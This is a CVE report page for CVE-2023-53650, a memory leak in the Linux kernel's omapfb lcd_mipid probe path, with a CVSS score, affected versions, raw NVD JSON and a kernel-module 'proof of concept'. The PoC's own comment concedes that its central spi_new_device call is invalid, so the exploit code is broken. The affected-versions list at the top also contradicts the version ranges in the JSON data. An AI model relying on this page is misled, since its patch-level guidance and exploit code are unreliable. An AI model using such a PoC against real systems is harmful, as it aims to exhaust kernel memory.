Security Vulnerability Report
CVE-2023-53650 CVSS 5.5 MEDIUM

CVE-2023-53650

Published: 2025-10-07 16:15:49
Last Modified: 2026-02-03 22:28:53
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

fbdev: omapfb: lcd_mipid: Fix an error handling path in mipid_spi_probe()

If 'mipid_detect()' fails, we must free 'md' to avoid a memory leak.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 5.10.226
Linux Kernel 5.15 < 5.15.168
Linux Kernel 6.1 < 6.1.113
Linux Kernel 6.6 < 6.6.54
Linux Kernel 6.10 < 6.10.13
Linux Kernel 6.11 < 6.11.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * CVE-2023-53650 - Linux Kernel omapfb lcd_mipid Memory Leak PoC
 * This PoC demonstrates the memory leak by repeatedly triggering
 * mipid_spi_probe() with a fake SPI device that causes mipid_detect() to fail.
 *
 * Note: This requires kernel module compilation and root privileges to load.
 */
#include <linux/module.h>
#include <linux/spi/spi.h>
#include <linux/kernel.h>
#include <linux/init.h>

MODULE_LICENSE("GPL");
MODULE_AUTHOR("Security Research");
MODULE_DESCRIPTION("PoC for CVE-2023-53650 omapfb lcd_mipid memory leak");

/* Simulate SPI device that will cause mipid_detect() to fail */
static struct spi_device *fake_spi_device;

static int __init leak_trigger_init(void)
{
	int i;
	struct spi_board_info chip = {
		.modalias = "panel-mipid",
		.bus_num = 0,
		.chip_select = 0,
		.max_speed_hz = 1000000,
	};

	printk(KERN_INFO "CVE-2023-53650 PoC: Triggering memory leak\n");

	/* Repeatedly register/deregister SPI device to trigger probe failures */
	for (i = 0; i < 1000; i++) {
		/*
		 * NOTE: spi_new_device() expects a struct spi_controller *;
		 * to_spi_device(NULL) does not provide one, so this call is
		 * not valid as written.
		 */
		fake_spi_device = spi_new_device(to_spi_device(NULL), &chip);
		if (fake_spi_device) {
			spi_unregister_device(fake_spi_device);
		}
		/* Each failed probe leaks one mipid_device struct */
	}

	printk(KERN_INFO "CVE-2023-53650 PoC: Memory leak triggered, check /proc/meminfo\n");
	return 0;
}

static void __exit leak_trigger_exit(void)
{
	printk(KERN_INFO "CVE-2023-53650 PoC: Module unloaded\n");
}

module_init(leak_trigger_init);
module_exit(leak_trigger_exit);

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53650", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:48.500", "lastModified": "2026-02-03T22:28:53.303", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfbdev: omapfb: lcd_mipid: Fix an error handling path in mipid_spi_probe()\n\nIf 'mipid_detect()' fails, we must free 'md' to avoid a memory leak."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.6.32", "versionEndExcluding": "4.14.322", "matchCriteriaId": "CE73FC1A-07E2-4D9A-AF1E-8AA66E7D850E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15", "versionEndExcluding": "4.19.291", "matchCriteriaId": "D2D2CA9F-4CC4-4AF5-8C6D-E58415AB782E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.251", "matchCriteriaId": "7FA663C4-CA72-4B5A-8592-7354D978F58E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.188", "matchCriteriaId": 
"43CAE50A-4A6C-488E-813C-F8DB77C13C8B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.121", "matchCriteriaId": "EC77775B-EC31-4966-966C-1286C02B2A85"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.39", "matchCriteriaId": "9BD1D4A1-304D-4187-8178-6D7C0050B1AF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.3.13", "matchCriteriaId": "95CB4836-7F5D-4C20-B025-8E046EC87B78"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.4", "versionEndExcluding": "6.4.4", "matchCriteriaId": "6AB81046-CB69-4115-924C-963B37C41385"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/09ea1ae4a2ec17774892cfcff50f6d33dfa1e06f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/3b4c21804076e461a6453ee4d09872172336aa1d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/716efd08985e3104031d1b655930b1f1c45fa8a7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/79a3908d1ea6c35157a6d907b1a9d8ec06015e7a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7a8f9293bee51183023c5e37e7ebf0543cd2a134", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7cca0af3167dd9603da5fa6fff3392f8338e97e1", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/9e3858f82e3ced1e990ef7116c3a16c84e62093e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": 
"https://git.kernel.org/stable/c/ce6e0434e502abdf966164b7c72523fb5fe54635", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d97840bf5a388c6cbf6e46216887bf17be62acc2", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}